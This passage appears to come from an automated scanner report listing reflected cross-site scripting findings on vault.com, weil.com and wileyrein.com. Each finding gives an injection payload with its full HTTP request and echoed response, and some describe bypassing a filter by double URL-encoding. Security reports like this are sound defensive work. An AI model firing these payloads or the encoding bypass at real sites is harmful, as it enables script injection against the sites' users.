HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:19 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000MQBSbTmGmG6cUM5JRSrgH2H:140i3s34m; Path=/
Keep-Alive: timeout=10, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:23 GMT;path=/
Content-Length: 105369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
WhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,
...[SNIP]...

4.134. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankings request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dd0"><script>alert(1)</script>38ea02e91b3 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:32 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ZhDNSaflUJHG19KHTNmMcEc:140i3s34m; Path=/
Keep-Alive: timeout=10, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:37 GMT;path=/
Content-Length: 112861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.co
...[SNIP]...

4.135. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankings request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5bc'-alert(1)-'f398cddff33 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:36 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=00006eAw26jeIW_D_4cRI9jb5gh:140i3s34m; Path=/
Keep-Alive: timeout=10, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:40 GMT;path=/
Content-Length: 112654


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,go
...[SNIP]...

4.136. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the regionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86be1"><script>alert(1)</script>fd63fd4328b was submitted in the regionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:48 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000X9qEA0qCib-qziLPO4C_5_v:140i3s34m; Path=/
Keep-Alive: timeout=10, max=73
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:53 GMT;path=/
Content-Length: 112905


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/us
...[SNIP]...

4.137. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the regionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b6'-alert(1)-'bf48ddfbfb1 was submitted in the regionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=00003TfEqWCiulBu_nDIESAN2zl:140i3s34m; Path=/
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:56 GMT;path=/
Content-Length: 112742


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
ID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...

4.138. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=h3zixcnxcv5l1a45xxonrz45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19529
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<!--
window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O
...[SNIP]...

4.139. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weil.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1
Host: www.weil.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 001148
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A02
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1087; path=/
Set-Cookie: PortletId=1701; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2rtk5eyh144bhwn4mxrat4ro; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1085&RootPortletID=665&RootPortletH4AssetID=1301&LicenseKey= &Name=Web Framework&URL=wc; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19431
Set-Cookie: NSC_MC_XfjmQpe_B0102=ffffffff09d5f61c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<title id="ctl00_htmlTitle">Weil, Gotshal &amp; Man
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]>
...[SNIP]...

4.140. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="85981"><script>alert(1)</script>038dfd0999c" value="1">
...[SNIP]...

4.141. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css490d8"><script>alert(1)</script>a3a95841ba2/_blog.css" value="">
...[SNIP]...

4.142. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_blog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_blog.css1c8c9"><script>alert(1)</script>84fbe621327" value="">
...[SNIP]...

4.143. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css86d6e"><script>alert(1)</script>a6da1f2345d/_list.css" value="">
...[SNIP]...

4.144. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_list.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/_list.cssd81ed"><script>alert(1)</script>da2c05f8831" value="">
...[SNIP]...

4.145. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
